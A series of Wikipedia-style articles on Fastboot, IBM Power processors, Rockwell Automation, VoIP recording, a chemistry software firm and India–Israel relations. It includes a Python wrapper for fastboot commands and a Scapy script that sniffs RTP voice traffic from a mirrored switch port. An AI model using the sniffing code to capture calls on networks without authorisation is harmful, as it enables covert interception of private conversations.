Extreme programming (XP) was designed for an environment where all developers are co-located, which is not the case in distributed software development. Furthermore, XP relies heavily on continuous communication between stakeholders and developers, which makes communication one of the five core values of XP. Consequently, communication is of particular importance when applying this methodology in a distributed environment and should be taken into account from the outset.
References
External links
Mind the Gap, list of tools for Global Software Engineering
Software development
|
28210693
|
https://en.wikipedia.org/wiki/Fastboot
|
Fastboot
|
Fastboot is a protocol and a tool of the same name. It is included with the Android SDK package and is used primarily to modify the flash filesystem via a USB connection from a host computer. It requires that the device be started in Fastboot mode; if the mode is enabled, the device will accept a specific set of commands sent to it over USB from a command line. Fastboot allows booting from a custom recovery image and does not require USB debugging to be enabled on the device. Not all Android devices have fastboot enabled. To use fastboot, a specific combination of keys must be held during boot.
Android device manufacturers are allowed to choose if they want to implement fastboot or some other protocol.
Keys pressed
The keys that have to be pressed for fastboot differ for various vendors.
HTC, Xiaomi, and Google Pixel: Power and volume down
Sony: Power and volume up
Google Nexus: Power, volume up and volume down
On Samsung devices (excluding the Nexus S and Galaxy Nexus), power, volume down and home have to be pressed to enter ODIN mode, a proprietary protocol and tool used as an alternative to fastboot.
Commands
Some of the most commonly used fastboot commands are listed below, followed by a short host-side scripting sketch:
flash rewrites a partition with a binary image stored on the host computer.
flashing unlock/oem unlock *** unlocks an OEM locked bootloader for flashing custom/unsigned ROMs. The *** is a device specific unlock key.
erase erases a specific partition.
reboot reboots the device into either the main operating system, the system recovery partition or back into its boot loader.
devices displays a list of all devices (with the serial number) connected to the host computer.
format formats a specific partition; the file system of the partition must be recognized by the device.
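As a rough illustration of how these commands might be driven from a host machine, the following sketch wraps the fastboot command-line tool using Python's subprocess module. It is not part of the Android SDK itself; the partition and image names are placeholder examples, the fastboot binary is assumed to be on the PATH, and the device must already be in Fastboot mode.

```python
# Illustrative sketch: invoking the fastboot CLI from a host script.
# Assumes the `fastboot` binary (Android SDK platform-tools) is on PATH and a
# device is connected in Fastboot mode. Partition/image names are examples only.
import subprocess

def fastboot(*args: str) -> str:
    """Run a single fastboot command and return its standard output."""
    result = subprocess.run(["fastboot", *args],
                            capture_output=True, text=True, check=True)
    return result.stdout

if __name__ == "__main__":
    print(fastboot("devices"))                        # list connected devices
    # Destructive operations are left commented out:
    # fastboot("flash", "recovery", "recovery.img")   # rewrite a partition
    # fastboot("erase", "cache")                      # erase a partition
    # fastboot("reboot")                              # reboot into the main OS
```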
Implementations
The fastboot protocol has been implemented in the Little Kernel fork of Qualcomm and in TianoCore EDK II.
Fastboot is a mode of the Android bootloader called ABOOT.
See also
Bootloader unlocking
Android recovery mode
References
External links
Flashing Devices - Android.com
Fastboot protocol specification
Reverse Engineering Android's Aboot
Android (operating system)
Communications protocols
Android (operating system) development software
|
7097316
|
https://en.wikipedia.org/wiki/Genuitec
|
Genuitec
|
Genuitec, LLC is a software development company that operates as an entirely virtual organization.
History
Genuitec’s roots go back to 1997 when Maher Masri, Todd Williams and Wayne Parrot started an enterprise-consulting company. After seeing a real need for better software development tools, they built them and used them extensively. Genuitec was established in 2001 as a small independent software company. As a founding member of the Eclipse Foundation, it actively participates in strategy, development, and direction for the organization.
References
Software companies based in Texas
Companies based in Dallas
Software companies of the United States
1997 establishments in the United States
1997 establishments in Texas
Software companies established in 1997
Companies established in 1997
|
38905656
|
https://en.wikipedia.org/wiki/IBM%20Power%20microprocessors
|
IBM Power microprocessors
|
IBM Power (originally POWER prior to Power10) is a line of microprocessors designed and sold by IBM for servers and supercomputers. The name "POWER" was originally presented as an acronym for "Performance Optimization With Enhanced RISC". These processors have been used by IBM in their RS/6000, AS/400, pSeries, iSeries, System p, System i and Power Systems line of servers and supercomputers. They have also been used in data storage devices and workstations by IBM and by other server manufacturers like Bull and Hitachi.
The Power family of processors were originally developed in the late 1980s and still remain under active development. In the beginning, they implemented the POWER instruction set architecture (ISA), which evolved into PowerPC and later into Power ISA. In August 2019, IBM announced it would be open-sourcing the Power ISA. As part of the move, it was also announced that administration of the OpenPOWER Foundation will now be handled by the Linux Foundation.
History
Early developments
The 801 research project
In 1974 IBM started a project to build a telephone switching computer that required, for the time, immense computational power. Since the application was comparatively simple, this machine would need only to perform I/O, branches, register-to-register adds, and moves of data between registers and memory, and would have no need for special instructions to perform heavy arithmetic. This simple design philosophy, whereby each step of a complex operation is specified explicitly by one machine instruction, and all instructions are required to complete in the same constant time, would later come to be known as RISC. When the telephone switch project was cancelled, IBM kept the design for the general-purpose processor and named it 801 after building #801 at the Thomas J. Watson Research Center.
The Cheetah project
By 1982, IBM was continuing to explore the superscalar limits of the 801 design, using multiple execution units to determine whether a RISC machine could sustain multiple instructions per cycle. Many changes were made to the 801 design to allow for multiple execution units, and the resulting Cheetah processor had separate branch-prediction, fixed-point and floating-point execution units. By 1984 CMOS was chosen, since it allowed an increase in the level of circuit integration while improving transistor-logic performance.
The America project
In 1985, research on a second-generation RISC architecture started at the IBM Thomas J. Watson Research Center, producing the "AMERICA architecture"; in 1986, IBM Austin started developing the RS/6000 series computers based on that architecture. This was to become the first POWER processors using the first POWER ISA.
POWER
In February 1990, the first computers from IBM to incorporate the POWER ISA were called the "RISC System/6000" or RS/6000. These RS/6000 computers were divided into two classes, workstations and servers, and hence introduced as the POWERstation and POWERserver. The RS/6000 CPU had 2 configurations, called the "RIOS-1" and "RIOS.9" (or more commonly the POWER1 CPU). A RIOS-1 configuration had a total of 10 discrete chips — an instruction cache chip, fixed-point chip, floating-point chip, 4 data L1 cache chips, storage control chip, input/output chips, and a clock chip. The lower cost RIOS.9 configuration had 8 discrete chips—an instruction cache chip, fixed-point chip, floating-point chip, 2 data cache chips, storage control chip, input/output chip, and a clock chip.
The POWER1 is the first microprocessor that used register renaming and out-of-order execution. A simplified and less powerful version of the 10-chip RIOS-1 was developed in 1992 for lower-end RS/6000s; it used only one chip and was called "RISC Single Chip" or RSC.
POWER1 processors
RIOS-1 the original 10-chip version
RIOS.9 a less powerful version of RIOS-1
POWER1+ a faster version of RIOS-1 made on a reduced fabrication process
POWER1++ an even faster version of RIOS-1
RSC a single-chip implementation of RIOS-1
RAD6000 a radiation-hardened version of the RSC, made available primarily for use in space; it was a very popular design and was used extensively on many high-profile missions
POWER2
IBM started the POWER2 processor effort as a successor to the POWER1. By adding a second fixed-point unit, a second powerful floating point unit, and other performance enhancements and new instructions to the design, the POWER2 ISA had leadership performance when it was announced in November 1993. The POWER2 was a multi-chip design, but IBM also made a single chip design of it, called the POWER2 Super Chip or P2SC that went into high performance servers and supercomputers. At the time of its introduction in 1996, the P2SC was the largest processor with the highest transistor count in the industry and was a leader in floating point operations.
POWER2 processors
POWER2 6 to 8 chips were mounted on a ceramic multi chip module
POWER2+ a cheaper 6-chip version of POWER2 with support for external L2 caches
P2SC a faster and single chip version of POWER2
P2SC+ an even faster version of the P2SC due to a reduced fabrication process
PowerPC
In 1991, Apple looked for a future alternative to Motorola's 68000-based CISC platform, and Motorola experimented with a RISC platform of its own, the 88000. IBM joined the discussion and the three founded the AIM alliance to build the PowerPC ISA, heavily based on the POWER ISA, but with additions from both Apple and Motorola. It was to be a complete 32/64 bit RISC architecture, with a promise to range from very low end embedded microcontrollers to the very high end supercomputer and server applications.
After two years of development, the resulting PowerPC ISA was introduced in 1993. A modified version of the RSC architecture, PowerPC added single-precision floating point instructions and general register-to-register multiply and divide instructions, and removed some POWER features. It also added a 64-bit version of the ISA and support for SMP.
The Amazon project
In 1990, IBM wanted to merge the low-end and midrange server architectures, the RS/6000 RISC ISA and the AS/400 CISC ISA, into one common RISC ISA that could host both IBM's AIX and OS/400 operating systems. The existing POWER and the upcoming PowerPC ISAs were deemed unsuitable by the AS/400 team, so an extension of the 64-bit PowerPC instruction set was developed, called PowerPC AS for Advanced Series or Amazon Series. Later, additions from the RS/6000 team and the AIM alliance PowerPC were included, and by 2001, with the introduction of POWER4, they were all joined into one instruction set architecture: PowerPC v.2.0.
POWER3
The POWER3 began its life as "PowerPC 630", a successor of the commercially unsuccessful PowerPC 620. It used a combination of the POWER2 ISA and the 32/64-bit PowerPC ISA set with support for SMP and single-chip implementation. It was used to great extent in IBM's RS/6000 computers, while the second generation version, the POWER3-II, was the first commercially available processor from IBM using copper interconnects. The POWER3 was the last processor to use a POWER instruction set; all subsequent models used some version of the PowerPC instruction set.
POWER3 processors
POWER3 – Introduced in 1998, it combined the POWER and PowerPC instruction sets.
POWER3-II – A faster POWER3 fabricated on a reduced size, copper based process.
POWER4
The POWER4 merged the 32/64-bit PowerPC instruction set and the 64-bit PowerPC AS instruction set from the Amazon project into the new PowerPC v.2.0 specification, unifying IBM's RS/6000 and AS/400 families of computers. Besides unifying the different platforms, POWER4 was also designed to reach very high frequencies and have large on-die L2 caches. It was the first commercially available multi-core processor and came in single-die versions as well as in four-chip multi-chip modules. In 2002, IBM also made a cost- and feature-reduced version of the POWER4, called PowerPC 970, at Apple's request.
POWER4 processors
POWER4 – The first dual core microprocessor and the first PowerPC processor to reach beyond 1 GHz.
POWER4+ – A faster POWER4 fabricated on a reduced process.
POWER5
The POWER5 processors built on the popular POWER4 and incorporated simultaneous multithreading (a technology pioneered in the PowerPC AS-based RS64-III processor) and on-die memory controllers into the design. The POWER5 was designed for multiprocessing on a massive scale and came in multi-chip modules with large onboard L3 cache chips.
POWER5 processors
POWER5 – The iconic setup with four POWER5 chips and four L3 cache chips on a large multi-chip module.
POWER5+ – A faster POWER5 fabricated on a reduced process mainly to reduce power consumption.
Power ISA
A joint organization was founded in 2004 called Power.org with the mission to unify and coordinate future development of the PowerPC specifications. By then, the PowerPC specification was fragmented since Freescale (née Motorola) and IBM had taken different paths in their respective development of it. Freescale had prioritized 32-bit embedded applications and IBM high-end servers and supercomputers. There was also a collection of licensees of the specification like AMCC, Synopsys, Sony, Microsoft, P.A. Semi, CRAY and Xilinx that needed coordination. The joint effort was not only to streamline development of the technology but also to streamline marketing.
The new instruction set architecture was called Power ISA and merged the PowerPC v.2.02 from the POWER5 with the PowerPC Book E specification from Freescale as well as some related technologies like the Vector-Media Extensions known under the brand name AltiVec (also called VMX by IBM) and hardware virtualization. This new ISA was called Power ISA v.2.03 and POWER6 was the first high end processor from IBM to use it. Older POWER and PowerPC specifications did not make the cut and those instruction sets were henceforth deprecated for good. There is no active development on any processor type today that uses these older instruction sets.
POWER6
POWER6 was the fruit of the ambitious eCLipz project, which aimed to join the I (AS/400), P (RS/6000) and Z (mainframe) instruction sets under one common platform. I and P had already been joined with the POWER4, but the eCLipz effort failed to include the CISC-based z/Architecture; the z10 processor became POWER6's eCLipz sibling. z/Architecture remains a separate design track to this day, unrelated to the Power ISA instruction set.
Because of eCLipz, the POWER6 is an unusual design as it aimed for very high frequencies and sacrificed out-of-order execution, something that has been a feature for POWER and PowerPC processors since their inception. POWER6 also introduced the decimal floating point unit to the Power ISA, something it shares with z/Architecture.
With the POWER6, in 2008 IBM merged the former System p and System i server and workstation families into one family called Power Systems. Power Systems machines can run different operating systems like AIX, Linux and IBM i.
POWER6 processors
POWER6 – Reached 5 GHz; comes in modules with a single chip on it, and in MCM with two L3 cache chips.
POWER6+ – A minor update, fabricated on the same process as POWER6.
POWER7
The POWER7 symmetric multiprocessor design was a substantial evolution from the POWER6 design, focusing more on power efficiency through multiple cores, simultaneous multithreading (SMT), out-of-order execution and large on-die eDRAM L3 caches. The eight-core chip could execute 32 threads in parallel and had a mode in which it could disable cores to reach higher frequencies on those that remain. It uses a new high-performance floating-point unit called VSX that merges the functionality of the traditional FPU with AltiVec. Even though the POWER7 ran at lower frequencies than the POWER6, each POWER7 core performed faster than its POWER6 counterpart.
POWER7 processors
POWER7 – Comes in single-chip modules or in quad-chip MCM-configurations for supercomputer applications.
POWER7+ – Scaled down fabrication process, and increased L3 cache and frequency.
POWER8
POWER8 is a 4 GHz, 12 core processor with 8 hardware threads per core for a total of 96 threads of parallel execution. It uses 96 MB of eDRAM L3 cache on chip and 128 MB off-chip L4 cache and a new extension bus called CAPI that runs on top of PCIe, replacing the older GX bus. The CAPI bus can be used to attach dedicated off-chip accelerator chips such as GPUs, ASICs and FPGAs. IBM states that it is two to three times as fast as its predecessor, the POWER7.
It was first built on a 22 nanometer process in 2014. In December 2012, IBM began submitting patches to the 3.8 version of the Linux kernel, to support new POWER8 features including the VSX-2 instructions.
POWER9
According to William Starke, a systems architect for the POWER8 processor, IBM spent a considerable amount of time designing the POWER9 processor. The POWER9 is the first to incorporate elements of the Power ISA version 3.0, which was released in December 2015, including the VSX-3 instructions, and it also incorporates support for Nvidia's NVLink bus technology.
The United States Department of Energy together with Oak Ridge National Laboratory and Lawrence Livermore National Laboratory contracted IBM and Nvidia to build two supercomputers, the Sierra and the Summit, that are based on POWER9 processors coupled with Nvidia's Volta GPUs. The Sierra went online in 2017 and the Summit in 2018.
POWER9, which was launched in 2017, is manufactured using a 14 nm FinFET process and comes in four versions: two 24-core SMT4 versions intended to use PowerNV, and two 12-core SMT8 versions intended to use PowerVM, each for scale-up and scale-out applications. More versions may appear in the future, since the POWER9 architecture is open for licensing and modification by OpenPOWER Foundation members.
Power10
Power10 is a CPU introduced in September 2021. It is built on a 7 nm technology.
Devices
See also
IBM OpenPower
OpenPOWER Foundation
References
External links
IBM Announces $1 Billion Linux Investment for Power Systems (LWN.net)
IBM microprocessors
|
1115509
|
https://en.wikipedia.org/wiki/Rockwell%20Automation
|
Rockwell Automation
|
Rockwell Automation, Inc. is an American provider of industrial automation and digital transformation. Their brands include Allen-Bradley, FactoryTalk software and LifecycleIQ Services.
Headquartered in Milwaukee, Wisconsin, Rockwell Automation employs approximately 24,500 people and has customers in more than 100 countries worldwide. The Fortune 500 company reported fiscal year 2021 global sales at $7 billion.
History
Early years
Rockwell Automation traces its origins to 1903 and the formation of the Compression Rheostat Company, founded by Lynde Bradley and Dr. Stanton Allen with an initial investment of $1000.
In 1904, 19-year-old Harry Bradley joined his brother in the business.
The company's first patented product was a carbon disc compression-type motor controller for industrial cranes. The crane controller was demonstrated at the St. Louis World's Fair in 1904.
In 1909, the company was renamed the Allen-Bradley Company.
Allen-Bradley expanded rapidly during World War I in response to government-contracted work. Its product line grew to include automatic starters and switches, circuit breakers, relays and other electric equipment.
In 1914, Fred Loock established the company's first sales office in New York.
Upon co-founder Stanton Allen's death in 1916, Lynde Bradley became president. Harry Bradley was appointed vice president and attorney Louis Quarles was named corporate secretary.
In 1918 Allen-Bradley hired its first female factory worker, Julia Bizewski Polczynski, who was promoted to foreman the following year.
During the 1920s, the company grew its miniature rheostat business to support the burgeoning radio industry. By the middle of this decade, nearly 50 percent of the company's sales were attributed to the radio department. The decade closed with record company sales of $3 million.
By 1932, the Great Depression had taken its toll and the company posted record losses. Amid growing economic pressure, Allen-Bradley reduced its workforce from 800 to 550 and cut wages by 50 percent. To lessen the financial burden, Lynde and Harry Bradley implemented a unique program: the company replaced employees’ lost wages with preferred stock. Eventually, the company bought back all stock at six percent interest.
Throughout this period, Lynde Bradley supported an aggressive research and development approach intended to "develop the company out of the Depression." Lynde Bradley's R&D strategy was successful. By 1937, Allen-Bradley employment had rebounded to pre-Depression levels and company sales reached an all-time high of nearly $4 million.
Mid-Late 20th century
Following the death of Lynde Bradley in 1942, Harry Bradley became company president and Fred Loock was promoted to vice president. The Lynde Bradley Foundation, a charitable trust, was established with Lynde Bradley's assets. The foundation's first gift of $12,500 was made to Milwaukee's Community Fund, predecessor of the United Way.
World War II fueled unprecedented levels of production, with 80 percent of the company's orders being war-related. Wartime orders were centered on two broad lines of products – industrial controls to speed production and electrical components or "radio parts" used in a wide range of military equipment.
Allen-Bradley expanded its facilities numerous times during the 1940s to meet war-time production needs. With Fred Loock serving as president and Harry Bradley as chairman, the company began a major $1 million, two-year expansion project in 1947. The company completed additional expansions at its Milwaukee facilities in the 1950s and 1960s, including the Allen-Bradley clock tower. The clock tower has since been renamed and is known today as the Rockwell Automation clock tower.
Harry Bradley died in 1965. Fred Loock retired in 1967 and died in 1973.
During the 1970s, the company expanded its production facilities and markets and entered the 1980s as a global company. With president J. Tracy O'Rourke (1981–89) at the helm, the company introduced a new line of programmable logic controllers: the PLC in 1981, followed by the PLC-2 in 1982 (models 2/30, 2/05, 2/16 and 2/17), the PLC-3 (1982), the SLC-100 family (1986), the SLC-500 (1986) and the PLC-5 family (1985). Earlier PLC developments were the MAC and the PLC-4.
In 1985 privately owned Allen-Bradley set a new fiscal record with sales of $1 billion. On February 20, 1985, Rockwell International purchased Allen-Bradley for $1.651 billion; this was the largest acquisition in Wisconsin's history to date. For all intents and purposes, Allen-Bradley took over Rockwell's industrial automation division.
The 1990s featured continued technology development, including the company's launch of its software business, Rockwell Software (1994), the Logix control platform (1997) and the Integrated Architecture system (1999). Rockwell International developed PowerFlex, a manufacturing software and technology in the 1990s.
During this decade, Rockwell International also acquired a power systems business, composed of Reliance Electric and Dodge. These two brands, combined with control systems brands Allen-Bradley and Rockwell Software, were marketed as Rockwell Automation.
In 1998, Keith Nosbusch was named president of Rockwell Automation Control Systems. Rockwell International Corporation headquarters was moved to Milwaukee, Wisconsin the same year.
21st century
In 2001, Rockwell International split into two companies. The industrial automation division became Rockwell Automation, while the avionics division became Rockwell Collins. The split was structured so that Rockwell Automation was the legal successor of Rockwell International, while Rockwell Collins was the spin-off. Rockwell Automation retains Rockwell International's stock price history and continues to trade on the New York Stock Exchange under the symbol "ROK".
Keith Nosbusch was named chief executive officer in 2004.
In 2007, Rockwell Automation sold the Power Systems division for $1.8 billion to Baldor Electric Company to focus on its core competencies in automation and information technology.
In 2007, Rockwell Automation acquired ICS Triplex.
In April 2016, it was announced that Keith Nosbusch would be replaced by Blake Moret effective July 1, 2016. Nosbusch would remain with Rockwell Automation as chairman. Moret was previously the senior vice president of the Control Products and Solutions segment of the company.
In June 2017, Rockwell Automation and Manpower launched the Academy of Advanced Manufacturing to provide training in digital manufacturing skills for military veterans.
Effective January 1, 2018, Keith Nosbusch will step down as Chairman. Blake Moret was elected the incoming Chairman by the board of directors.
On June 11, 2018, Rockwell Automation made a $1 billion equity investment in PTC acquiring an 8.4% ownership stake.
In February 2019, Rockwell Automation and Schlumberger entered a joint venture to create Sensia, the oil and gas industry's first fully integrated automation solutions provider.
Rockwell Automation is announced as a founding member of ISA Global Cybersecurity Alliance to help advance readiness and awareness in manufacturing.
In November 2019, the company announced a partnership with Accenture's Industry X.0 to help deliver greater industrial supply chain optimization.
Simulation software provider ANSYS and Rockwell Automation announce partnership to help customers design simulation-based digital twins of products, processes, and manufacturing.
November 2019 Rockwell Automation joins forces with Accenture, Microsoft, PTC, ANSYS, and EPLAN to help businesses simplify digital transformation.
Company announces restructuring into 3 operating segments, effective Oct. 1, 2020: Intelligent Devices, Software & Control, and Lifecycle Services.
In September 2020 Rockwell Automation is recognized for its culture of supporting women by the Society of Women Engineers.
PTC and Rockwell Automation announce expansion and extension of their strategic alliance.
October 2020 partnership with Microsoft announced to develop edge-to-cloud based solutions for connecting information between development, operations, and maintenance teams.
November 2020 Company announces plans to achieve carbon neutrality (Scopes 1 and 2) by 2030.
February 2021 Rockwell Automation announces its first Chief Diversity, Equity, and Inclusion Officer.
On Feb. 23, 2021, Rockwell Automation was recognized by Ethisphere as one of the 2021 World’s Most Ethical Companies, marking the 13th time the company received this honor.
Robot manufacturer Comau and Rockwell Automation partner to simplify robot integration for industries.
May 2021 Rockwell Automation and Cisco partner to combat rapidly evolving industrial cybersecurity threats by adding Cisco’s Cyber Vision to the LifecycleIQ Service portfolio.
Company creates new role of Chief Sustainability Officer.
September 2021 Rockwell Automation and Ansys announce partnership for enhanced Studio 5000 Simulation Interface to connect with Ansys digital twins.
On November 9, 2021, the company celebrated the opening of its 30th annual Automation Fair in Houston.
Rockwell Automation announced new partnerships with cybersecurity services leaders Dragos and CrowdStrike. The company also established a new Cybersecurity Operations Center in Israel.
Business Operations
Rockwell Automation is a global company focusing on industrial automation and digital transformation. In 2021, Rockwell Automation adjusted its organizational structure into three operating segments—Intelligent Devices, Software & Control, and Lifecycle Services.
Rockwell Automation has three primary areas of business operations:
Allen-Bradley—automated components and integrated control systems for safety, sensing, industrial control, power control and motion control.
FactoryTalk—software that supports advanced industrial applications including system design, operations, plant maintenance, and analytics.
LifecycleIQ Services—services to help connect, secure, mobilize, and scale manufacturing operations.
Acquisitions
In recent years, Rockwell Automation has grown through acquisitions of companies specializing in software services for supply chain management, systems integrators, cloud-native smart manufacturing platforms, simulation capabilities, manufacturing execution systems, and cybersecurity services.
2019
MESTECH Services – Provider of Manufacturing Execution Systems (MES)/Manufacturing Operations Management (MOM), digital solutions consulting, and systems integration services.
Emulate3D – Software developer for simulating and emulating industrial automation systems.
2020
Fiix – Provider of artificial intelligence-enabled computerized maintenance management systems.
Oylo – Provider of industrial control system (ICS) cybersecurity services including assessments, turnkey implementations, managed services, and incident response.
Kalypso – Software delivery and consulting firm specializing in digital transformation for industrial companies.
ASEM – Provider of digital automation technologies including industrial PCs, HMI software and hardware, remote access and secure industrial IoT gateway solutions.
Avnet – Provider of IT/OT cybersecurity services and solutions including assessments, penetration testing, network & security solutions, and training for converged IT/OT managed services.
2021
AVATA – Services provider for supply chain management, enterprise resource planning, and company performance management.
Plex Systems – Cloud-native smart manufacturing platform operating at scale, including advanced Manufacturing Execution Systems (MES), quality and supply chain management capabilities.
Notable distinctions
In 2020 it was named to the Newsweek America’s Most Responsible Companies list.
In 2021 Rockwell was named to the FTSE4Good Index Series for the 20th time. The Index is designed to measure the performance of companies demonstrating strong Environmental, Social, and Governance (ESG) practices.
Also, in 2021 the company was listed on the Dow Jones Sustainability Indices for the 11th time. The pioneering series of global sustainability benchmarks is composed of global, regional, and country leaders annually assessed on long-term governance and economic, environmental, and social criteria.
In 2021 Rockwell was named to Barron’s 100 Most Sustainable Companies list and ranked among the top five companies in the Leading Climate Aligned Companies category.
See also
Allen-Bradley
Allen-Bradley Clock Tower
Engineer In Training (EIT) Program
Programmable Logic Controller
Retro-Encabulator, fictional Rockwell Automation device
References
External links
Rockwell Automation
Rockwell Software
Allen-Bradley
Sustainability Report
Company blogs
Case studies
Podcasts
The Journal
Companies listed on the New York Stock Exchange
Technology companies established in 1903
Manufacturers of industrial automation
Manufacturing companies based in Milwaukee
MES software
1903 establishments in Wisconsin
Electric motor manufacturers
|
8409909
|
https://en.wikipedia.org/wiki/VoIP%20recording
|
VoIP recording
|
Voice over Internet Protocol (VoIP) recording is a subset of telephone recording or voice logging, first used by call centers and now being used by all types of businesses. There are many reasons for recording Voice over IP call traffic such as: reducing company vulnerability to lawsuits by maintaining recorded evidence, complying with telephone call recording laws, increasing security, employee training and performance reviews, enhancing employee control and alignment, verifying data, sharing data as well as customer satisfaction and enhancing call center agent morale.
Operation
By definition, Voice over IP is audio converted into digital packets and then converted to IP packets. VoIP recording is accomplished either by sniffing the network or by having the packets duplicated and directed to the recorder—passive recording or active recording, respectively.
Sniffing (passive recording) is done by connecting to the SPAN (Switched Port ANalyzer) port, which allows the VoIP recording unit to monitor all network traffic and pick out only the VoIP traffic to record, identified by either MAC address or IP address. This is usually done by connecting an Ethernet cable between the VoIP recording unit and the router, switch, or hub. Via the SPAN port, the recorder "sniffs" for signaling and RTP (Real-time Transport Protocol) packets whose headers contain the identifying information of the endpoints designated for recording. There are two main ways to capture the RTP packets with the SPAN port. One can SPAN the VoIP gateway port, which captures all inbound and outbound traffic and offers a single point of contact for recording. This is especially helpful on a campus with phones in multiple locations. However, this method cannot capture internal, peer-to-peer (phone-to-phone) calls, because their VoIP traffic is sent directly between the phones and does not flow through the gateway port.
Duplication and redirection requires setting up a VLAN (Virtual LAN) that includes all the phones, and then SPANning that VLAN. This allows recording of all inbound, outbound and internal traffic. The disadvantage is that not all phones are always on a VLAN, or on the same VLAN, so multiple SPANs may be needed. Another method is to use RSPAN (remote SPAN), in which the VLANs that are set to SPAN are trunked across switches to a receiving switch.
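As a rough sketch of the passive approach, the fragment below uses the Scapy packet-manipulation library to listen on a mirrored (SPAN) interface and flag likely RTP streams by checking the RTP version bits in the UDP payload. The interface name is a placeholder, and a production recorder would additionally parse the signaling (for example SIP) to associate streams with calls and would write the decoded audio to storage.

```python
# Minimal sketch of passive VoIP capture on a SPAN/mirror port.
# Assumes Scapy is installed and the script runs with capture privileges;
# "eth0" is a placeholder for the interface attached to the SPAN port.
from scapy.all import sniff, IP, UDP

def looks_like_rtp(payload: bytes) -> bool:
    # The RTP fixed header is 12 bytes; the top two bits of the first byte
    # carry the RTP version, which is 2 in current implementations.
    return len(payload) >= 12 and (payload[0] & 0xC0) == 0x80

def handle(pkt):
    if pkt.haslayer(IP) and pkt.haslayer(UDP):
        payload = bytes(pkt[UDP].payload)
        if looks_like_rtp(payload):
            print(f"RTP {pkt[IP].src}:{pkt[UDP].sport} -> "
                  f"{pkt[IP].dst}:{pkt[UDP].dport} ({len(payload)} bytes)")
            # A real recorder would buffer payloads per stream and decode
            # them (e.g. G.711) into audio files for storage and retrieval.

if __name__ == "__main__":
    sniff(iface="eth0", filter="udp", prn=handle, store=False)
```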
Challenges
VoIP is usually implemented as a cost-saving measure over POTS (plain old telephone service), and the same now holds true for VoIP recording. Most recording vendors are able to record the various VoIP codecs such as G.711, G.729a/b and G.723 with software-only solutions, in contrast to the intensive hardware and software associated with legacy PBX recording.
Today, most VoIP vendors offer recording methods specific to their own VoIP call and communications management servers. These vendors offer what is referred to as active VoIP recording, in which the recording vendor's solution becomes an "active" participant within the call for recording purposes. This approach offers some benefits over the long-established sniffing (passive) method in environments where the handsets to be recorded are off site or in remote locations, or where the network routing would make a passive solution overcomplicated. It also greatly simplifies recording internal calls, as it is no longer necessary to duplicate the audio streamed between two handsets to the voice recorder; the telephony system manages this automatically.
Disadvantages of "active" call recording can include overheads on the PBX, the need for agent interaction and changes to the quality of the call. "Passive" call-recording software works by using packet-filter technology to listen for VoIP calls on the LAN on a monitored port. The RTP stream is then captured and converted to a WAV file for storage and retrieval.
Other methods
VoIP calls can be recorded via streaming audio recording applications. Most call centers and other organizations required to record calls would more often use a recording system offered by the softphone or IP PBX. Streaming audio recorders can be useful for home-based recording.
See also
Telephone tapping
References
Call-recording software
Voice over IP
Surveillance
Privacy of telecommunications
Communication software
|
12593908
|
https://en.wikipedia.org/wiki/Chemical%20Computing%20Group
|
Chemical Computing Group
|
Chemical Computing Group is a software company specializing in research software for computational chemistry, bioinformatics, cheminformatics, docking, pharmacophore searching and molecular simulation. The company's main customer base consists of pharmaceutical and biotechnology companies, as well as academic research groups. It is a private company that was founded in 1994; it is based in Montreal, Quebec, Canada. Its main product, Molecular Operating Environment (MOE), is written in a self-contained programming system, the Scientific Vector Language (SVL).
Products
MOE (Molecular Operating Environment)
MOE is a drug discovery software platform that integrates visualization, modeling and simulations, as well as methodology development. MOE scientific applications are used by biologists, medicinal chemists and computational chemists in pharmaceutical, biotechnology and academic research. MOE runs on Windows, Linux, Unix and Mac OS X.
Main application areas: Structure-Based Design, Fragment-Based Design, Pharmacophore Discovery, Medicinal Chemistry Applications, Biologics Applications, Protein and Antibody Modeling, Molecular Modeling and Simulations, Cheminformatics & QSAR
PSILO: A Protein Structure Database System
PSILO is a protein structure database system that provides a repository for macromolecular and protein-ligand structural information. It allows research organizations to track, register and search both experimental and computational macromolecular structural data. A web-browser interface facilitates the searching and accessing of public and private structural data.
See also
Other institutions developing software for computational chemistry:
Accelrys
BioSolveIT
Cresset Biomolecular Discovery
Desert Scientific Software
Inte:Ligand
MolSoft
OpenEye Scientific Software
Pharmacelera
Schrödinger
VLifeMDS Software
NovaMechanics Ltd Cheminformatics Solutions
References
External links
Excellence Award for student posters at ACS National Meetings
Review of MOE 2005.06
Molecular fingerprints in MOE
Discussion of Binary QSAR: Jürgen Bajorath (2004), Chemoinformatics: Concepts, Methods, and Tools for Drug Discovery page 92
Research support companies
Software companies of Canada
Companies based in Montreal
Molecular modelling software
|
7199609
|
https://en.wikipedia.org/wiki/India%E2%80%93Israel%20relations
|
India–Israel relations
|
India–Israel relations (; ) refer to the bilateral relations between the Republic of India and the State of Israel. The two countries have an extensive and comprehensive economic, military, and political relationship.
Israel is represented through an embassy in New Delhi and consulates in Mumbai and Bangalore; India is represented through an embassy in Tel Aviv.
India is the largest buyer of Israeli military equipment and Israel is the second-largest supplier of military equipment to India after Russia. From 1999 to 2009, military business between the two nations was worth around . Military and strategic ties between the two nations extend to intelligence-sharing on terrorist groups and joint military training.
, India is the third-largest Asian trade partner of Israel, and its tenth-largest trade partner overall; bilateral trade, excluding military sales, stood at . Relations further expanded during Indian Prime Minister Narendra Modi's administration, with India abstaining from voting against Israel in several United Nations resolutions. , the two nations are negotiating an extensive bilateral free-trade agreement, focusing on areas such as information technology, biotechnology and agriculture.
According to an international poll conducted in 2009, 58 percent of Indians expressed sympathy with Israel with regards to the Arab–Israeli conflict, compared to 56 percent of Americans.
History
Ancient relations
Excavation at Tel Megiddo shows evidence of Indo-Mediterranean trade between South Asia and the southern Levant from the mid-second millennium BCE, demonstrating the presence of turmeric, banana and sesame, all of which originate from South Asia. Geographical analysis suggests that the authors of the Old Testament were referring to India when describing trade in animals such as monkeys and peacocks. According to Chaim Menachem Rabin, the connection between ancient Israel and the Indian subcontinent was recorded during the reign of King Solomon (10th century BCE) in I Kings 10.22. Ancient trade and cultural communication between India and the Levant is documented in the Periplus of the Erythraean Sea and the accounts surrounding the Queen of Sheba in the Hebrew Bible. Jews who settled in Kochi, Kerala, trace their origin back to the time of King Solomon and are called Cochin Jews. Later, Paradesi Jews migrated to Kochi during the 15th and 16th centuries following the expulsion of Jews from Spain.
